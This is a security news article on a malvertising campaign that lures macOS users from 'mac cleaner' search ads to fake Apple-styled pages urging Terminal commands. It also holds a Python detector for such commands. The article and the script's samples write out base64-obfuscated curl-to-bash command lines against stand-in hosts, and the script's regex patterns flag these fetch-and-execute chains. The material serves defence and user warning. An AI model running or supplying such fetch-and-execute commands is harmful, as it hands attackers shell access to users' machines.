Cybercriminals have taken control of Google Search Ads for "mac cleaner" queries, deceiving macOS users into visiting phony websites that imitate Apple's layout. These sponsored results deliver remote code execution (RCE) payloads while promising speedy storage fixes.
The scheme was uncovered by security researchers, who found obfuscated commands that silently download and execute malware. Google Ads accounts, possibly compromised, fuel the abuse. The fraud begins innocently: when users search for "mac cleaner", top sponsored links from seemingly reputable advertisers such as "Nathaniel Josue Rodriguez" and "Aloha Shirt Shop" appear.
Clicks lead to Google Apps Script pages (script.google.com/macros) styled like Apple’s site, complete with non-functional navigation menus. Fake instructions ask users to use Terminal commands to "free up disk space" or "check storage." Do not run them, researchers caution.
Obfuscated Payloads Exposed

One malicious page pushes this command chain:

    echo "Cleaning macOS Storage..."
    echo '...' | base64 -D
    echo 'Installing packages please wait...'

The echo "Cleaning macOS Storage..." line mimics routine maintenance and diverts the user's attention. The true danger lies in the base64-encoded string: the base64 -D flag decodes it into a shell command that fetches and executes a remote script with the user's permissions.

Image: advertisements that direct you to reliable websites (Source: MacKeeper)
No real cleaning takes place; it is social engineering for RCE. A second page employs a more covert strategy:

    /bin/bash -c "$(echo '...' | base64 -d | curl -fsSL)"

Here, $(...) substitutes the output of the inner commands. After decoding a hidden URL, it downloads the script silently with curl -fsSL (-f fails silently on server errors, -s suppresses progress output, -S still shows errors, -L follows redirects) and pipes it to bash for immediate execution. This is equivalent to curl https://suspicious-site.com/script.sh | bash, obfuscated to avoid detection.

Possible Risks and the Attack Chain

These payloads give attackers complete shell access with the user's permissions.
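The decode-and-inspect reasoning above can be turned into a detection check. The following Python script is an added example, not code from this article or from MacKeeper: it takes a shell command line (for instance from EDR process telemetry), decodes any base64 blob that the command itself pipes into base64 -D/-d, and flags the download-and-execute patterns described above (curl piped into a shell, $(curl ...) command substitution, decoder output piped into a shell, and a URL or curl call that only becomes visible after decoding). The indicator names, regexes and sample commands are this script's own choices; the two samples are constructed to mirror the two page patterns, the hostname is a reserved .invalid name, and the script never executes or fetches anything.

```python
"""Decode base64 blobs in a shell command line and flag curl-to-shell patterns.

Added example for this article (not MacKeeper's code): the indicator names,
the regexes and the sample commands are all this script's own choices.
"""
import base64
import binascii
import re

# A base64 blob piped into the decoder. macOS `base64` uses -D, GNU coreutils uses -d.
B64_PIPE_RE = re.compile(r"""['"]?([A-Za-z0-9+/=]{12,})['"]?\s*\|\s*base64\s+(?:-D|-d|--decode)\b""")

# Download-and-execute patterns, checked on the raw command and on every decoded layer.
INDICATOR_RES = {
    # curl ... | bash   (or sh / zsh)
    "curl_pipe_shell": re.compile(r"\bcurl\b[^|;&]*\|\s*(?:/bin/)?(?:ba|z)?sh\b"),
    # $(curl ...)  -> the fetched script becomes the command text
    "curl_in_command_substitution": re.compile(r"\$\(\s*curl\b"),
    # bash -c "$( ... )"  -> the shell runs whatever the substitution produced
    "shell_runs_substituted_output": re.compile(r"""\b(?:ba)?sh\s+-c\s+["']?\$\("""),
    # ... | base64 -D | bash  -> decoder output piped straight into a shell
    "decoder_piped_to_shell": re.compile(r"\bbase64\s+(?:-D|-d|--decode)\s*\|\s*(?:/bin/)?(?:ba|z)?sh\b"),
    # one combined flag group carrying both -s (silent) and -L (follow redirects), e.g. -fsSL
    "curl_silent_follow_flags": re.compile(r"\bcurl\s+-(?=[A-Za-z]*s)(?=[A-Za-z]*L)[A-Za-z]+"),
    "remote_url": re.compile(r"https?://[^\s'\"|;)]+"),
}
# Any of these means fetched content is executed, regardless of what else is present.
EXEC_INDICATORS = {"curl_pipe_shell", "curl_in_command_substitution",
                   "shell_runs_substituted_output", "decoder_piped_to_shell"}


def decode_base64_blobs(command):
    """Return the decoded text of every base64 blob the command pipes into base64 -D/-d.
    Blobs that are not valid base64 or not UTF-8 text are skipped rather than raised."""
    decoded = []
    for match in B64_PIPE_RE.finditer(command):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return decoded


def analyse_command(command):
    """Classify one shell command line.

    Returns {"indicators": sorted list, "decoded": decoded layers, "suspicious": bool}.
    A command is suspicious when it executes fetched content, or when a URL or a
    curl call only becomes visible after decoding (the article's "hidden URL" case)."""
    decoded = decode_base64_blobs(command)
    indicators = set()
    if decoded:
        indicators.add("base64_decoded_in_pipeline")
    for layer in [command] + decoded:
        for name, pattern in INDICATOR_RES.items():
            if pattern.search(layer):
                indicators.add(name)
    if any(INDICATOR_RES["remote_url"].search(t) or "curl" in t for t in decoded):
        indicators.add("url_or_download_hidden_by_encoding")
    suspicious = bool(indicators & EXEC_INDICATORS) or "url_or_download_hidden_by_encoding" in indicators
    return {"indicators": sorted(indicators), "decoded": decoded, "suspicious": suspicious}


# Constructed samples modelled on the two page patterns. The host is a reserved
# .invalid name, so nothing here resolves; this script never runs any of them.
_HIDDEN_CMD = base64.b64encode(b"curl -fsSL https://mac-cleaner-fix.example.invalid/clean.sh | bash").decode()
_HIDDEN_URL = base64.b64encode(b"https://mac-cleaner-fix.example.invalid/clean.sh").decode()

SAMPLE_PAGE_ONE = ('echo "Cleaning macOS Storage..."; '
                   "echo '" + _HIDDEN_CMD + "' | base64 -D | bash; "
                   "echo 'Installing packages please wait...'")
SAMPLE_PAGE_TWO = '/bin/bash -c "$(curl -fsSL $(echo \'' + _HIDDEN_URL + '\' | base64 -d))"'
SAMPLE_BENIGN = 'echo "Cleaning macOS Storage..."; du -sh ~/Library/Caches'

if __name__ == "__main__":
    for label, cmd in [("page one", SAMPLE_PAGE_ONE), ("page two", SAMPLE_PAGE_TWO), ("benign", SAMPLE_BENIGN)]:
        verdict = analyse_command(cmd)
        print(f"{label:8s} suspicious={verdict['suspicious']} indicators={verdict['indicators']}")
        for layer in verdict["decoded"]:
            print("         decoded:", layer)
```

The "Cleaning macOS Storage..." echo on its own produces no indicator, which is the point: the decoy text is harmless and only the decoded layer and the execution plumbing around it are worth alerting on. The check is deliberately strict about what counts as execution, so a plain curl download to a file is reported with its URL but not marked suspicious.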
Downloaded scripts could:

- Install persistent malware or adware.
- Steal browser data, passwords, or SSH keys.
- Install remote-control backdoors.
- Mine cryptocurrency using the Mac's resources.
- Exfiltrate files to command-and-control servers.
- Disable security tools or change system settings.

Silent flags ensure no pop-ups alert victims. This strategy mimics popular vectors such as supply chain attacks, malware installers, and phony GitHub READMEs.
Image: Malicious Mac Cleaner Ads Scam (Source: MacKeeper)

Although macOS's user-level execution limits damage to the system itself, user-writable paths still allow data theft and persistence.

Technique | Explanation | Impact
--- | --- | ---
Base64 encoding | Hides commands in innocent-looking strings | Bypasses basic scanners
Piping curl into bash | Silently downloads and runs remote scripts | Enables RCE without writing files to disk
Apple UI imitation | Fake menus create a false sense of trust | Increases the rate at which users run the commands
Google Apps Script | Leverages trusted domains | Evades ad blockers

According to MacKeeper, researchers confirmed that the ads redirect from trusted-looking domains, such as docs.google.com previews, to these scripts.
No CVEs are directly involved; the campaign exploits user trust in Google and Apple branding. Advertiser profiles raise red flags: "Nathaniel Josue Rodriguez" (Google Transparency ID: AR03742598973764927489) runs benign ads elsewhere, while "Aloha Shirt Shop" (AR00152784596742701057) shows one suspicious entry.
Verified advertisers receive prime ad placement and therefore wider reach, which hijacked accounts would explain. This wave of malvertising targets macOS users who, faced with growing storage needs, search for disk cleanup tools. Similar scams previously hit Windows "PC optimizer" searches.